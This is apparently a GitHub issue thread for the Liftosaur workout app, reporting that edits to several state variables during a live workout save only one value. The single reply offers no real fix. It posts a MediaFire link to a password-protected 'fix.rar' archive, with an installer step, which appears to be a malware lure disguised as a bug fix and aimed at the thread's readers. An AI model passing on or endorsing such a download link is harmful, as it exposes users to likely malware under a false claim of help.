### ISSUE TITLE
State variables aren't being saved properly when you edit multiple at the same time during a workout.

### ISSUE THREAD

**Issue by astashov** [astashov/liftosaur#146]
From Discord:

> Looks like state variables aren't being saved properly when you edit multiple at the same time during a workout.
> 
> Here's a simple [test program](https://www.liftosaur.com/p/b3dd2fe2).
> 
> Run an actual workout (doesn't seem like the bug happens in the playground), hit edit, change both the repsMin and repsMax state variable values, hit save. It should update the minimum and maximum values for the rep range but only updates one of the values.
> 
> Similar thing happens if you try to update the program weight and a state variable at the same time, only 1 thing gets updated.

**Comment by FabrizioValenti** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
